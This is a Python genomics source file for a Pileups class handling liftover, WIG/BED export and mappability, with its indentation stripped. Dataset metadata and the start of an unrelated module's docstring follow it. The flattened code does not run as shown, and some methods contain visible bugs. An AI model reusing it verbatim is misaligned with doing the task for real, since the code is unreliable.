# slicing backwards requires subtracting 1 from both indices to get the same positions as a forward slice
ref_start = query_start + ref_offset
ref_end = query_end + ref_offset
# assert ref_start > 0
# assert ref_end < len(self.pileups[ref_chrom])
if interval_polarity == -1:
query_start -= 1
query_end -= 1
query_start, query_end = query_end, query_start # flip around
if ref_chrom in self.pileups:
try:
self.pileups[ref_chrom][ref_start:ref_end] = \
source_pileups.pileups[query_chrom][query_start:(query_end, None)[
query_end == -1]:interval_polarity] # make sure we include the 0th element in the reverse slice
except ValueError as ve:
print(('Interval: {}'.format(interval)))
print(('Interval polarity: {}'.format(interval_polarity)))
print(('Query interval: {} {}, {}, size: {}'.format(query_chrom, query_start, query_end,
query_end - query_start)))
print(('Reference offset: {}'.format(ref_offset)))
print(('Reference interval: {} {}, {}, size: {}'.format(ref_chrom, ref_start, ref_end,
ref_end - ref_start)))
raise ve
print(
('\t\tDone with chromosome {} in {}'.format(query_chrom, datetime.datetime.now() - start_time)))
else:
print(('\tQuery chromosome {} not in source'.format(query_chrom)))
else:
print(('\tQuery chromosome {} has no mapped intervals, skipping'.format(query_chrom)))
print(('Done lifting over data from {} to {} in {}.'.format(source_pileups.build, self.build,
datetime.datetime.now() - overall_start_time)))
def liftoverWithChain_old(self, source_pileups, chain_basepath, destination_dtype=None):
"""
Uses <chain_file> to liftover the contents of <source_pileups> to itself.
Chain files are named <Reference>To<Query>
"""
start_time = datetime.datetime.now()
if not destination_dtype:
destination_dtype = self.pileup_dtype
header_fields = (
'dummy', 'score', 'tName', 'tSize', 'tStrand', 'tStart', 'tEnd', 'qName', 'qSize', 'qStrand', 'qStart',
'qEnd',
'id')
# generate chain filename
chain_filename = os.path.join(chain_basepath,
'{}To{}.over.chain'.format(toolbox.first_lower(source_pileups.build),
toolbox.first_upper(self.build)))
missing_chroms = set([])
print(('Lifting over from {} using chain file {}'.format(source_pileups.name, chain_filename)))
with open(chain_filename, 'rt') as chain_file:
self._initialize(pileup_dtype=destination_dtype)
new_chain = True
good_chain = False
for line_num, line in enumerate(chain_file):
# new chain
if line_num % REPORTING_INTERVAL == 0:
dbg_print('Processing line {}'.format(line_num), 1)
if new_chain and line != '\n': # insurance against multiple blank lines
header = toolbox.parse_line_dict(line, header_fields, split_char=' ', strict=True)
assert header['dummy'] == 'chain'
new_chain = False
# relative offsets within the chain
ref_chain_pos = 0
query_chain_pos = 0
ref_chrom = toolbox.convert_chroms(header['tName'], dest=source_pileups.chromosome_dialect)
query_chrom = toolbox.convert_chroms(header['qName'], dest=self.chromosome_dialect)
good_chain = False
if query_chrom in self.pileups:
try:
assert int(header['qSize']) == len(self.pileups[query_chrom])
except AssertionError as ae:
print((
'Error on line {}, chain {}. Chain file size of {} for query chromosome {} does not match our size of {}'.format(
line_num, header['id'], header['qSize'], query_chrom, len(self.pileups[query_chrom]))))
raise ae
if ref_chrom in source_pileups.pileups:
try:
assert int(header['tSize']) == len(source_pileups.pileups[ref_chrom])
except AssertionError as ae:
print((
'Error on line {}, chain {}. Chain file size of {} for reference chromosome {} does not match source size of {}'.format(
line_num, header['id'], header['tSize'], ref_chrom,
len(source_pileups.pileups[ref_chrom]))))
raise ae
good_chain = True
else:
missing_chroms.add(query_chrom)
ref_chain_start = int(header['tStart'])
query_chain_start = int(header['qStart'])
elif line == '\n':
# start a new chain on the next line
new_chain = True
elif good_chain:
# it must be a data line
split_line = line.split('\t')
size = int(split_line[0])
if len(split_line) == 3:
ref_diff = int(split_line[1])
query_diff = int(split_line[2])
elif len(split_line) == 1:
ref_diff = 0
query_diff = 0
else:
raise Exception(
'Encountered a chain alignment data line of length 2 on line {}. Unsure how to handle this.'.format(
line_num))
ref_start_pos = ref_chain_start + ref_chain_pos
ref_end_pos = ref_start_pos + size
ref_chain_pos += size + ref_diff
query_start_pos = query_chain_start + query_chain_pos
query_end_pos = query_start_pos + size
query_chain_pos += size + query_diff
# print line_num, ref_chrom, ref_start_pos, ref_end_pos, query_chrom, query_start_pos, query_end_pos, ref_chain_pos, query_chain_pos
self.pileups[query_chrom][query_start_pos:query_end_pos] = source_pileups.pileups[ref_chrom][
ref_start_pos:ref_end_pos]
# self.pileups[query_chrom][query_start_pos:query_end_pos] += 1
print(('Done in {}.'.format(datetime.datetime.now() - start_time)))
if missing_chroms:
print(('The following chromosomes in the chain file were missing in the destination organism: {}'.format(
','.join(sorted(list(missing_chroms))))))
def exportToWig(self, output_filename, name='', description='', destination_chromosome_dialect='ucsc',
wig_type='fixedStep', convert_to_bigwig=False):
"""
Exports the contents of the pileup in WIG format (see http://genome.ucsc.edu/goldenpath/help/wiggle.html for specification)
using "fixedStep" intervals
"""
start_time = datetime.datetime.now()
write_count = 0
total_length = sum(self.chrom_lengths.values())
WIGTOBIGWIG_PATH = 'wigToBigWig'
if wig_type not in ('fixedStep', 'variableStep'):
raise ValueError('Invalid parameter value for parameter <wig_type>. Got {}'.format(wig_type))
if not name:
name = self.name
output_path, output_prefix, output_extension = toolbox.parse_path(output_filename)
wig_filename = os.path.join(output_path, output_prefix + '.wig')
print(('Exporting contents of {} to {} in WIG format...'.format(name, wig_filename)))
with open(output_filename, 'w') as wig_file:
# write header
wig_file.write(
'track type=wiggle_0 name={} description={}\n'.format(
self.name.replace(' ', '_'), description.replace(' ', '_')))
# write track data
for chrom in toolbox.numerical_string_sort(list(self.pileups.keys())):
chromOut = toolbox.convert_chroms(chrom, dest=destination_chromosome_dialect)
dbg_print('Scanning chromosome {} to find first and last non-zero values ...'.format(chrom))
nz = numpy.nonzero(self.pileups[chrom])[0]
if len(nz) > 0:
start_pos = nz[0]
end_pos = nz[-1]
print(('\tNon-zero region: {}-{}'.format(start_pos, end_pos)))
if wig_type == 'fixedStep':
wig_file.write('fixedStep chrom={} start={} step=1\n'.format(
chromOut, start_pos))
for pos in range(start_pos, end_pos):
if write_count % 1e7 == 0:
print(('\twriting line {:>10}, {:>3.0f} % done'.format(write_count,
write_count * 100 / float(
total_length))))
write_count += 1
wig_file.write('{}\n'.format(self.pileups[chrom][pos]))
elif wig_type == 'variableStep':
wig_file.write('variableStep chrom={}\n'.format(
chromOut))
for pos in range(start_pos, end_pos):
if write_count % 1e7 == 0:
print(('\twriting line {:>10}. {:>3.0f} % done'.format(write_count,
write_count * 100 / float(
total_length))))
write_count += 1
wig_file.write('{} {}\n'.format(pos, self.pileups[chrom][pos]))
else:
print(('\tNo non-zero entries found for chromosome {} of length {}'.format(chrom,
self.chrom_lengths[
chrom])))
file_size = wig_file.tell()
print(('Done in {}.'.format(datetime.datetime.now() - start_time)))
print(('Resulting file has {} lines, total size: {:.2} MB'.format(write_count, file_size / float(2 ** 20))))
if convert_to_bigwig:
start_time = datetime.datetime.now()
bigwig_filename = os.path.join(output_path, output_prefix + '.bw')
print(('Converting to bigwig format as {}'.format(bigwig_filename)))
temp_chromosome_size_filename = os.path.join(output_path, '{}_chrom_sizes.txt'.format(self.build))
with open(temp_chromosome_size_filename, 'w') as chrom_size_file:
for chrom in self.chrom_lengths:
chrom_size_file.write('{}\t{}\n'.format(
toolbox.convert_chroms(chrom, dest=destination_chromosome_dialect),
self.chrom_lengths[chrom]))
cmd_line = [WIGTOBIGWIG_PATH, wig_filename, temp_chromosome_size_filename, bigwig_filename]
try:
conversion_output = subprocess.check_output(cmd_line)
except subprocess.CalledProcessError as cpe:
print(('Error: {}, {}, {}'.format(cpe.returncode, cpe.message, cpe.output)))
except Exception as ex:
print((ex.args, ex.message))
else:
print(conversion_output)
print(('Done in {}.'.format(datetime.datetime.now() - start_time)))
def exportToBed(self, bed_filename, region_prefix='region',
destination_chromosome_dialect='ucsc'):
"""
Exports the contents of the pileup in BED format
(see http://genome.ucsc.edu/FAQ/FAQformat.html#format1 for specification)
"""
start_time = datetime.datetime.now()
write_count = 0
print(('Exporting contents of {} to {} in BED format...'.format(self.name, bed_filename)))
with open(bed_filename, 'w') as bed_file:
bed_writer = csv.writer(bed_file, dialect=csv.excel_tab)
# write track data
for chrom in toolbox.numerical_string_sort(list(self.pileups.keys())):
previous_value = 0
region_start = 0
for pos in range(self.chrom_lengths[chrom]):
# if the value changed or we hit the end, then
if self.pileups[chrom][pos] != previous_value or pos == self.chrom_lengths[chrom] - 1:
if previous_value > 0: # we're ending a region, write it out
if write_count % 1e6 == 0:
dbg_print('Writing line {}'.format(write_count), 1)
write_count += 1
# WIG indexing is one-based
chromOut = toolbox.convert_chroms(chrom, dest=destination_chromosome_dialect)
chromStart = region_start
chromEnd = pos + 1
name = '{}_{}'.format(region_prefix, write_count)
score = previous_value
bed_writer.writerow([chromOut, chromStart, chromEnd, name, score])
if self.pileups[chrom][pos] > 0: # we're starting a new region
region_start = pos
previous_value = self.pileups[chrom][pos]
file_size = bed_file.tell()
print(('Done in {}.'.format(datetime.datetime.now() - start_time)))
print(('Resulting file has size: {:.2} MB'.format(file_size / float(2 ** 20))))
def mappabilityFromChain(self, other_build, other_chrom_lengths, from_or_to='from',
other_chromosome_dialect=DEFAULT_CHROMOSOME_DIALECT, chainfile_basepath=CHAINFILE_BASEPATH,
interval_basepath=INTERVAL_BASEPATH, score_threshold=None,
query_size_threshold=None, ref_size_threshold=None):
overall_start_time = datetime.datetime.now()
from_or_to = from_or_to.lower()
assert from_or_to in ('from', 'to')
print(('Populating with vector of mappability {} {}'.format(from_or_to, other_build)))
if from_or_to == 'to':
ref_build = other_build
query_build = self.build
ref_chrom_lengths = other_chrom_lengths
query_chrom_lengths = self.chrom_lengths
ref_chrom_dialect = other_chromosome_dialect
query_chrom_dialect = self.chromosome_dialect
else:
ref_build = self.build
query_build = other_build
ref_chrom_lengths = self.chrom_lengths
query_chrom_lengths = other_chrom_lengths
ref_chrom_dialect = self.chromosome_dialect
query_chrom_dialect = other_chromosome_dialect
# get intervals
best_intervals = filterchains.get_liftover_intervals(dest_build=ref_build,
dest_chrom_lengths=ref_chrom_lengths,
source_build=query_build,
source_chrom_lengths=query_chrom_lengths,
chainfile_basepath=chainfile_basepath,
interval_basepath=interval_basepath,
score_threshold=score_threshold,
query_size_threshold=query_size_threshold,
ref_size_threshold=ref_size_threshold,
source_chromosome_dialect=query_chrom_dialect,
dest_chromosome_dialect=ref_chrom_dialect)
# apply intervals
self._initialize()
missing_query_chroms = set([])
missing_ref_chroms = set([])
mapped_counter = 0
for query_chrom in best_intervals:
if len(best_intervals[query_chrom]) > 0:
# print query_chrom, len(self.pileups[query_chrom])
if from_or_to == 'from' or query_chrom in self.pileups:
print(('\tComputing mappability for source chromosome {} with {} intervals'.format(query_chrom, len(
best_intervals[query_chrom]))))
start_time = datetime.datetime.now()
interval_counter = 0
for interval_idx, interval in enumerate(best_intervals[query_chrom]):
# if interval_idx % REPORTING_INTERVAL == 0:
# _print(
# 'Processing interval {} of {}'.format(interval_idx + 1,
# len(best_intervals[query_chrom])),
# 3)
query_start, query_end, ref_chrom, ref_offset, interval_polarity = interval
if from_or_to == 'from':
if ref_chrom in self.pileups:
self.pileups[ref_chrom][query_start + ref_offset:query_end + ref_offset] += 1
# print self.pileups[ref_chrom][query_start + ref_offset:query_end+ ref_offset]
else:
missing_ref_chroms.add(ref_chrom)
else:
self.pileups[query_chrom][query_start:query_end] += 1
interval_counter += 1
mapped_counter += query_end - query_start
print(
('\t\tDone with chromosome {} in {}'.format(query_chrom, datetime.datetime.now() - start_time)))
else:
print(('\tQuery chromosome {} not in self'.format(query_chrom)))
missing_query_chroms.add(query_chrom)
else:
print(('\tQuery chromosome {} has no mapped intervals, skipping'.format(query_chrom)))
if missing_query_chroms:
print(('The following chromosomes in the interval file were missing in the query: {}'.format(
', '.join(sorted(list(missing_query_chroms))))))
if missing_ref_chroms:
print(('The following chromosomes in the interval file were missing in the reference: {}'.format(
', '.join(sorted(list(missing_ref_chroms))))))
print(('Done computing mappability of {} {} {} in {}.'.format(self.build, from_or_to, other_build,
datetime.datetime.now() - overall_start_time)))
self_covered_loci = self.flatten().astype(numpy.int).sum()
print((self_covered_loci, self.genome_size))
print(('Mappings processed for {} loci, covering {} of self ({} of total)'.format(mapped_counter,
self_covered_loci,
self_covered_loci / float(
self.genome_size))))
print()
def mappabilityFromMappingTable(self, mapping_table_filename, from_or_to='from'):
"""
if <from_or_to> = 'from':
Populate self with a vector counting how many loci in the source organism map
to loci in self, given a mapping table in <mapping_table_filename>
if <from_or_to> = 'to':
Populate self with a vector counting how many loci in self map
to loci in the source organism, given a mapping table in <mapping_table_filename>
"""
# Field positions
CHROM_FIELD = 0
DESTINATION_FRAG_START = 4
DESTINATION_INSERTION = 5
DESTINATION_FRAG_END = 6
SOURCE_FRAG_START = 8
SOURCE_INSERTION = 9
SOURCE_FRAG_END = 10
self._initialize()
start_time = datetime.datetime.now()
with open(mapping_table_filename, 'rt') as mapping_table:
table_reader = csv.reader(mapping_table, dialect=csv.excel_tab)
for line_num, line in enumerate(table_reader):
# remember mapping table is 1-based
if line_num % 100000 == 0:
dbg_print('Reading line {}'.format(line_num), 1)
if line[SOURCE_FRAG_START] != line[SOURCE_FRAG_END]:
# print line
chrom = toolbox.convert_chroms(line[CHROM_FIELD], dest=self.chromosome_dialect)
if chrom not in self.pileups:
warning_message = 'Found chromosome {} in mapping table but no record of it in {}.'.format(
chrom, self.build)
print(('Warning: {}'.format(warning_message)))
break
# raise Exception(warning_message)
dest_frag_start = int(line[DESTINATION_FRAG_START]) - 1
dest_frag_end = int(line[DESTINATION_FRAG_END]) + 1
source_frag_start = int(line[SOURCE_FRAG_START]) - 1
source_frag_end = int(line[SOURCE_FRAG_END]) + 1
if line[DESTINATION_INSERTION] == r'\N' and line[SOURCE_INSERTION] == r'\N':
if source_frag_end - source_frag_start != dest_frag_end - dest_frag_start:
raise Exception(
'Source ({} bp) and destination ({} bp) fragments not the same size on line {}'.format(
source_frag_end - source_frag_start, dest_frag_end - dest_frag_start, line_num))
else:
try:
if from_or_to == 'from':
self.pileups[chrom][dest_frag_start:dest_frag_end] += 1
else:
self.pileups[chrom][source_frag_start:source_frag_end] += 1
except ValueError as ve:
print((
'Unequal fragment sizes have slipped through on line {}. May be a chromosome size mismatch.'.format(
line_num)))
print(('Source: {} {} {}, destination: {} {} {}'.format(source_frag_start,
source_frag_end,
source_frag_end - source_frag_start,
dest_frag_start, dest_frag_end,
dest_frag_end - dest_frag_start)))
print(('chrom: {}'.format(chrom)))
raise ve
print(('Done in {}'.format(datetime.datetime.now() - start_time)))
def mappabilityFromChain_old(self, chain_file_basepath, other_build, from_or_to='from', use_score=False):
"""
Populate with a 'mappability' vector derived from <chain_filename> that
indicates the mappability of each locus in itself to the other species.
If <use_score> is false, each locus will be 1 if mappable from the
reference species, 0 otherwise.
If <use_score> is true, each locus will contain the log10 value of the
score field for the chain that maps to it, 0 otherwise.
A note about chain files: The files are named in the form
ReferenceToQuery, which is counter to my intuition, at least.
So the build of this pileups object should match the reference build of
the chain file being used (the first build in the filename)
"""
start_time = datetime.datetime.now()
header_fields = (
'dummy', 'score', 'tName', 'tSize', 'tStrand', 'tStart', 'tEnd', 'qName', 'qSize', 'qStrand', 'qStart',
'qEnd',
'id')
from_or_to = from_or_to.lower()
assert from_or_to in ('from', 'to')
print(('Populating with vector of mappability ({}) {} {}'.format(('binary', 'log10_score')[use_score],
from_or_to, other_build)))
if from_or_to == 'from':
ref_build = other_build
query_build = self.build
else:
ref_build = self.build
query_build = other_build
chain_filename = os.path.join(chain_file_basepath, '{}To{}.over.chain'.format(toolbox.first_lower(ref_build),
toolbox.first_upper(query_build)))
print(('Using chain file: {}'.format(chain_filename)))
with open(chain_filename, 'rt') as chain_file:
self._initialize()
new_chain = True
good_chain = False
mapped_count = 0
# total_ref = 0
# total_query = 0
for line_num, line in enumerate(chain_file):
# new chain
if line_num % REPORTING_INTERVAL == 0:
dbg_print('Reading line {}'.format(line_num), 1)
if new_chain and line != '\n': # insurance against multiple blank lines
header = toolbox.parse_line_dict(line, header_fields, split_char=' ', strict=True)
assert header['dummy'] == 'chain'
new_chain = False
# relative offsets within the chain
ref_chain_pos = 0
query_chain_pos = 0
ref_chrom = toolbox.convert_chroms(header['tName'], dest=self.chromosome_dialect)
query_chrom = toolbox.convert_chroms(header['qName'], dest=self.chromosome_dialect)
ref_size = int(header['tSize'])
query_size = int(header['qSize'])
# total_ref += ref_size
# total_query += query_size
good_chain = False
if from_or_to == 'from':
if query_chrom in self.pileups:
assert query_size == len(self.pileups[query_chrom])
good_chain = True
else:
if ref_chrom in self.pileups:
assert ref_size == len(self.pileups[ref_chrom])
good_chain = True
# print ref_chrom, query_chrom, good_chain
ref_chain_start = int(header['tStart'])
query_chain_start = int(header['qStart'])
elif line == '\n':
# start a new chain on the next line
new_chain = True
elif good_chain:
# it must be a data line
split_line = line.split('\t')
size = int(split_line[0])
if len(split_line) == 3:
ref_diff = int(split_line[1])
query_diff = int(split_line[2])
elif len(split_line) == 1:
ref_diff = 0
query_diff = 0
else:
raise Exception(
'Encountered a chain alignment data line of length 2 on line {}. Unsure how to handle this.'.format(
line_num))
ref_start_pos = ref_chain_start + ref_chain_pos
ref_end_pos = ref_start_pos + size
ref_chain_pos += size + ref_diff
query_start_pos = query_chain_start + query_chain_pos
query_end_pos = query_start_pos + size
query_chain_pos += size + query_diff
mapped_count += size
if use_score:
score = math.log10(int(header['score']))
else:
score = 1
if from_or_to == 'from':
self.pileups[query_chrom][query_start_pos:query_end_pos] += score
else:
self.pileups[ref_chrom][ref_start_pos:ref_end_pos] += score
print(('Done in {}.'.format(datetime.datetime.now() - start_time)))
self_covered_loci = self.flatten().astype(numpy.int).sum()
print(('Mappings processed for {} loci, covering {} of self ({} of total)'.format(mapped_count,
self_covered_loci,
self_covered_loci / float(
self.genome_size))))
def copy(self, dtype=None):
"""
Alias for deepCopy()
:param dtype:
:return:
"""
if not dtype:
dtype = self.pileup_dtype
return self.deepCopy(dtype)
def deepCopy(self, dtype=None):
"""
Returns a new pileups object containing the same data (a deep copy) with an optional change of datatype.
:param other:
:return:
"""
if not dtype:
dtype = self.pileup_dtype
new_pu = self.emptyCopy()
# print 'Creating deep copy of {}'.format(self.name)
for chrom in self.pileups:
# print '\t{}'.format(chrom)
new_pu.pileups[chrom] = self.pileups[chrom].astype(dtype=dtype)
return new_pu
def shallowCopy(self):
new_pu = self.emptyCopy()
# print 'Creating shallow copy of {}'.format(self.name)
for chrom in self.pileups:
new_pu.pileups[chrom] = self.pileups[chrom]
return new_pu
def emptyCopy(self):
"""
Returns a new pileups object containing the same meta-data but with no pileups data
:return:
"""
# print 'Creating empty copy of {}'.format(self.name)
new_pu = Pileups(self.chrom_lengths, name=self.name, build=self.build,
chromosome_dialect=self.chromosome_dialect)
new_pu.pileups = {}
new_pu.is_normalized = self.is_normalized
# new_pu.genome_size = self.genome_size
new_pu.coverage = self.coverage
# new_pu.max_height = self.max()
new_pu.total_reads = self.total_reads
new_pu.mean_read_length = self.mean_read_length
new_pu.mode_read_length = self.mode_read_length
new_pu.pileup_dtype = self.pileup_dtype
return new_pu
def apply(self, func):
for chrom in self.pileups:
self.pileups[chrom] = func(self.pileups[chrom])
def toType(self, pileup_dtype=PILEUP_DTYPE):
"""
Converts all pileup chromosome vectors to the specified data type
:param pileup_dtype:
:return:
"""
self.pileup_dtype = pileup_dtype
for chrom in self.pileups:
self.pileups[chrom] = self.pileups[chrom].astype(pileup_dtype)
def astype(self, pileup_dtype=PILEUP_DTYPE):
"""
Analogous to the numpy.astype() method, returns a new pileup
with chromosome data in the specified data type.
:param pileup_dtype:
:return:
"""
new_pileup = self.emptyCopy()
new_pileup.pileup_dtype = pileup_dtype
for chrom in self.pileups:
new_pileup.pileups[chrom] = self.pileups[chrom].astype(pileup_dtype)
return new_pileup
def memMap(self, writable=True, tmp_dir=NETWORK_TMP_DIR):
"""
Converts pileup chromosome vectors to mem_mapped arrays on disk.
"""
self.save_path = os.path.join(tmp_dir, 'pileup_{}'.format(self.id))
print('Saving to {} in mem mapped mode. Writable: {}'.format(self.save_path, writable))
if not os.path.exists(self.save_path):
os.makedirs(self.save_path)
max_chroms_to_map = min(len(self.pileups), MAX_FILEHANDLES_PER_PILEUP)
for chrom in sorted(self.pileups, key=lambda x: len(x), reverse=True)[:max_chroms_to_map]:
vector_fname = os.path.join(self.save_path, '{}.npy'.format(chrom))
numpy.save(vector_fname, self.pileups[chrom])
self.pileups[chrom] = numpy.load(vector_fname, mmap_mode=('r', 'r+')[writable])
def ceil(self):
result = Pileups(self.chrom_lengths, build=self.build, name=self.name)
for chrom in self.chrom_lengths:
result.pileups[chrom] = numpy.ceil(self.pileups[chrom])
return result
def floor(self):
result = Pileups(self.chrom_lengths, build=self.build, name=self.name)
for chrom in self.chrom_lengths:
result.pileups[chrom] = numpy.floor(self.pileups[chrom])
return result
def round(self, decimals=0):
result = Pileups(self.chrom_lengths, build=self.build, name=self.name)
for chrom in self.chrom_lengths:
result.pileups[chrom] = numpy.round(self.pileups[chrom], decimals=decimals)
return result
def logical_and(self, other):
result = Pileups(self.chrom_lengths, build=self.build, name=self.name)
for chrom in self.pileups:
if chrom in other.pileups:
result.pileups[chrom] = numpy.logical_and(self.pileups[chrom], other.pileups.chrom)
return result
def logical_or(self, other):
result = Pileups(self.chrom_lengths, build=self.build, name=self.name)
for chrom in self.pileups:
if chrom in other.pileups:
result.pileups[chrom] = numpy.logical_or(self.pileups[chrom], other.pileups.chrom)
return result
def logical_not(self):
result = Pileups(self.chrom_lengths, build=self.build, name=self.name)
for chrom in self.pileups:
result.pileups[chrom] = numpy.logical_not(self.pileups[chrom])
return result
@property
def max(self):
"""
Maximum value contained in any chromosome
:return:
"""
self.max_height = float('-Inf')
for chrom in self.pileups:
self.max_height = max(self.max_height, max(self.pileups[chrom]))
return self.max_height
def fill(self, value):
"""
Fill up the chromosome arrays with <value>
"""
print(('Filling chromosome vectors with {}'.format(value)))
self._initialize()
for chrom in self.chrom_lengths:
self.pileups[chrom] = numpy.full(self.chrom_lengths[chrom], value, dtype=float)
print('Done.')
def nonzero(self):
"""
Returns a new pileup object consisting of boolean vectors marking whether or not a position was 0 in the parent
pileup object
"""
new_pileups = self.copy()
for chrom in new_pileups.pileups:
new_pileups.pileups[chrom] = numpy.greater(self.pileups[chrom], 0)
return new_pileups
def threshold(self, min_value=None, max_value=None):
"""
Returns a new pileup object where every value less than <min_value> or greater than <max_value>
has been replaced by 0
:param min_value:
:param max_value:
:return:
"""
print('Replacing all values {}{}{} with 0'.format(('', 'below {}'.format(min_value))[bool(min_value)],
('', ' or ')[bool(min_value) and bool(max_value)],
('', 'above {}'.format(max_value))[bool(max_value)]))
new_pileups = self.copy()
for chrom in new_pileups.pileups:
print('\tProcessing chromosome {} ...'.format(chrom))
new_pileups.pileups[chrom] = self.pileups[chrom][:]
if min_value is not None:
new_pileups.pileups[chrom] *= numpy.greater(self.pileups[chrom], min_value).astype(float)
if max_value is not None:
new_pileups.pileups[chrom] *= numpy.less(self.pileups[chrom], max_value).astype(float)
return new_pileups
def __iadd__(self, other):
try:
assert self.build == other.build
self.name = '({}+{})'.format(self.name, other.name)
for chrom in self.chrom_lengths:
assert len(self.pileups[chrom]) == len(other.pileups[chrom])
self.pileups[chrom] += other.pileups[chrom]
self.is_normalized = self.is_normalized and other.is_normalized
except (AttributeError, ValueError):
self.name = '({}+{})'.format(self.name, other)
for chrom in self.chrom_lengths:
self.pileups[chrom] = numpy.add(self.pileups[chrom], other)
return self
def __isub__(self, other):
try:
assert self.build == other.build
self.name = '({}-{})'.format(self.name, other.name)
for chrom in self.chrom_lengths:
assert len(self.pileups[chrom]) == len(other.pileups[chrom])
self.pileups[chrom] -= other.pileups[chrom]
self.is_normalized = self.is_normalized and other.is_normalized
except (AttributeError, ValueError):
self.name = '({}-{})'.format(self.name, other)
for chrom in self.chrom_lengths:
self.pileups[chrom] = numpy.subtract(self.pileups[chrom], other)
return self
def __imul__(self, other):
try:
# type(other) == type(self):
assert self.build == other.build
self.name = '({}*{})'.format(self.name, other.name)
for chrom in self.chrom_lengths:
assert len(self.pileups[chrom]) == len(other.pileups[chrom])
self.pileups[chrom] *= other.pileups[chrom]
self.is_normalized = self.is_normalized and other.is_normalized
except (AttributeError, ValueError):
self.name = '({}*{})'.format(self.name, other)
for chrom in self.chrom_lengths:
self.pileups[chrom] = numpy.multiply(self.pileups[chrom], other)
return self
def __idiv__(self, other):
try:
assert self.build == other.build
self.name = '({}/{})'.format(self.name, other.name)
for chrom in self.chrom_lengths:
assert len(self.pileups[chrom]) == len(other.pileups[chrom])
self.pileups[chrom] /= other.pileups[chrom]
self.is_normalized = self.is_normalized and other.is_normalized
except (AttributeError, ValueError):
self.name = '({}/{})'.format(self.name, other)
for chrom in self.chrom_lengths:
self.pileups[chrom] = numpy.divide(self.pileups[chrom], other)
return self
def __add__(self, other):
result = self.emptyCopy()
try:
assert self.build == other.build
result.name = '({}+{})'.format(self.name, other.name)
for chrom in self.chrom_lengths:
assert len(self.pileups[chrom]) == len(other.pileups[chrom])
result.pileups[chrom] = self.pileups[chrom] + other.pileups[chrom]
result.is_normalized = self.is_normalized and other.is_normalized
except (AttributeError, ValueError):
for chrom in self.pileups:
result.pileups[chrom] = numpy.add(self.pileups[chrom], other)
result.name = '({}+{})'.format(self.name, other)
return result
def __sub__(self, other):
result = self.emptyCopy()
try:
assert self.build == other.build
result.name = '({}-{})'.format(self.name, other.name)
for chrom in self.chrom_lengths:
assert len(self.pileups[chrom]) == len(other.pileups[chrom])
result.pileups[chrom] = self.pileups[chrom] - other.pileups[chrom]
result.is_normalized = self.is_normalized and other.is_normalized
except (AttributeError, ValueError):
for chrom in self.pileups:
result.pileups[chrom] = numpy.subtract(self.pileups[chrom], other)
result.name = '({}-{})'.format(self.name, other)
return result
def __mul__(self, other):
result = self.emptyCopy()
try:
assert self.build == other.build
result.name = '({}*{})'.format(self.name, other.name)
for chrom in self.chrom_lengths:
# if chrom in other.chrom_lengths:
assert len(self.pileups[chrom]) == len(other.pileups[chrom])
result.pileups[chrom] = self.pileups[chrom] * other.pileups[chrom]
result.is_normalized = self.is_normalized and other.is_normalized
except (AttributeError, ValueError) as ex:
print(ex)
for chrom in self.pileups:
result.pileups[chrom] = numpy.multiply(self.pileups[chrom], other)
result.name = '({}*{})'.format(self.name, other)
return result
def __div__(self, other):
result = self.emptyCopy()
try:
assert self.build == other.build
result.name = '({}/{})'.format(self.name, other.name)
for chrom in self.chrom_lengths:
# if chrom in other.chrom_lengths:
assert len(self.pileups[chrom]) == len(other.pileups[chrom])
result.pileups[chrom] = self.pileups[chrom] / other.pileups[chrom].astype(float)
result.is_normalized = self.is_normalized and other.is_normalized
except (AttributeError, ValueError) as ex:
print(ex)
for chrom in self.pileups:
result.pileups[chrom] = numpy.divide(self.pileups[chrom], float(other))
result.name = '({}/{})'.format(self.name, other)
return result
def __pos__(self):
return self
def __neg__(self):
negated = Pileups(self.chrom_lengths, build=self.build, name=self.name)
for chrom in self.chrom_lengths:
negated.pileups[chrom] = -self.pileups[chrom]
return negated
def __len__(self):
return self.genome_size
def __abs__(self):
result = Pileups(self.chrom_lengths, build=self.build, name=self.name)
for chrom in self.chrom_lengths:
result.pileups[chrom] = numpy.abs(self.pileups[chrom])
return result
def __repr__(self):
result = 'Pileups object. Name: {}, Build: {}\n'.format(self.name, self.build)
result += 'Chromosome lengths:\n'
for chrom in self.chrom_lengths:
result += '\t{:>40}\t{:>11}\n'.format(chrom, self.chrom_lengths[chrom])
try:
result += 'Data type: {}\n'.format(list(self.pileups.values())[0].dtype)
except Exception:
pass
return result
def pileup_sum(pileup_sequence):
"""
Returns the sum of a sequence of pileup objects
:param pileup_sequence:
:return:
"""
sum_total = pileup_sequence[0]
if len(pileup_sequence) > 1:
for pu in pileup_sequence[1:]:
sum_total += pu
return sum_total
def pileup_product(pileup_sequence):
product_total = pileup_sequence[0].deepCopy()
if len(pileup_sequence) > 1:
for pu in pileup_sequence[1:]:
product_total *= pu
return product_total
def test():
import pp_config
schmidt_configs = {'C57B6_mm9': pp_config.read_config('config/schmidt_mouse.txt'),
'human': pp_config.read_config('config/schmidt_human.txt')}
configs = schmidt_configs
control_configs = schmidt_configs
for config in list(configs.values()):
for k in config:
if type(config[k]) == str:
config[k] = config[k].replace('oasis', 'oasis_local')
del config
chroms = {}
for organism in ('C57B6_mm9',):
chroms[organism] = get_chrom_length_dict(
os.path.join(os.environ['HOME'], '.local', 'opt', 'idrCode', 'genome_tables',
'genome_table.{}.txt'.format(configs[organism]['IDR_GENOME_NAME'])))
test1 = Pileups(chrom_lengths=chroms['C57B6_mm9'], build='mm9')
test1.loadFromWig(
'/cellar/users/dskola/oasis_local/wigs/GSM1014195_mm9_wgEncodeUwDnaseLiverC57bl6MAdult8wksSigRep2.wig')
if __name__ == '__main__':
test()
|
phageghost/pg_tools
|
pgtools/pileups.py
|
Python
|
mit
| 198,251
|
[
"Bowtie",
"Gaussian"
] |
578d1b58443ff34f3c0dc82c89b87d268cf75c7c52286e474481de4d4ec72592
|
"""Get useful information from live Python objects.
This module encapsulates the interface provided by the internal special
attributes (co_*, im_*, tb_*, etc.) in a friendlier fashion.
It also provides some help for examining source code and class layout.
Here are some of the useful functions provided by this module:
ismodule(), isclass(), ismethod(), isfunction(), isgeneratorfunction(),
isgenerator(), istraceback(), isframe(), iscode(), isbuiltin(),
isroutine() - check object types
getmembers() - get members of an object that satisfy a given condition
getfile(), getsourcefile(), getsource() - find an object's source code
getdoc(), getcomments() - get documentation on an object
getmodule() - determine the module that an object came from
getclasstree() - arrange classes so as to represent their hierarchy
getargvalues(), getcallargs() - get info about function arguments
getfullargspec() - same, with support for Python 3 features
formatargvalues() - format an argument spec
getouterframes(), getinnerframes() - get info about frames
currentframe() - get the current stack frame
stack(), trace() - get info about frames on the stack or in a traceback
